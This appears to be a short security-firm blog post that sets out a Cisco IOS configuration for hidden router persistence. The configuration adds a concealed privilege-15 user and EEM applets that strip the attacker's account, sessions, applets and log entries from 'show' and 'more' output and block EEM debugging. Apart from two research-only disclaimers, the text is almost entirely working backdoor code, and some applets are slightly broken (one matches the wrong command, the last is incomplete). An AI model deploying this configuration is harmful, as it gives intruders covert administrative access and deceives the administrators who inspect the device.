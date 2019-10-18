Offshore 2.0 Bespoke Testing and Security Services
Beginning Reminder: This article is written for research and experimentation purposes only. Only ever access devices you have written, legal authorization to access.
config t
username hidden_YourUser priv 15 sec yourPassword1234
! Hides the EEM code from the running config show command
event manager applet hidden_eemRunningConfig
event cli pattern "show run" sync yes
action 0.0 cli command "enable"
action 1.0 cli command "show run | ex hidden|event|action"
action 2.0 puts "$_cli_result"
! Hides the EEM code from the startup config show command
event manager applet hidden_eemStartupConfig
event cli pattern "show run" sync yes
action 0.0 cli command "enable"
action 1.0 cli command "show start | ex hidden|event|action"
action 2.0 puts "$_cli_result"
! Hides the bad actor's active VTY (telnet/ssh) session
event manager applet hidden_VTY
event cli pattern "show users" sync yes
action 0.0 cli command "enable"
action 1.0 cli command "show users | ex hidden"
action 2.0 puts "$_cli_result"
! Hides the bad actor's active SSH session
event manager applet hidden_sshSession
event cli pattern "show ssh" sync yes
action 0.0 cli command "enable"
action 1.0 cli command "show ssh | ex hidden"
action 2.0 puts "$_cli_result"
! Hides the EEM actions from showing up in local logging via show command
event manager applet hidden_eemLogging
event cli pattern "show log" sync yes
action 0.0 cli command "enable"
action 1.0 cli command "show log | ex HA_EM|hidden"
action 2.0 puts "$_cli_result"
! Hides the EEM and new user from showing up in more system:running" command
event manager applet hidden_moreRunning
event cli pattern "more system:running-config" sync yes
action 0.0 cli command "enable"
action 1.0 cli command "more system:run | ex hidden|event|action"
action 2.0 puts "$_cli_result"
! Hides the EEM and new user from showing up in more system:start" command
event manager applet hidden_moreStart
event cli pattern "more system:running-config" sync yes
action 0.0 cli command "enable"
action 1.0 cli command "more system:start | ex hidden|event|action"
action 2.0 puts "$_cli_result"
! Prevents EEM from being debugged, which could catch our malicious EEMs in action
event manager applet hidden_EEMdebug
event cli pattern "debug event manager" sync yes
action 0.0 cli command "enable"
Ending Reminder: This article is written for research and experimentation purposes only. Only ever access devices you have written, legal authorization to access.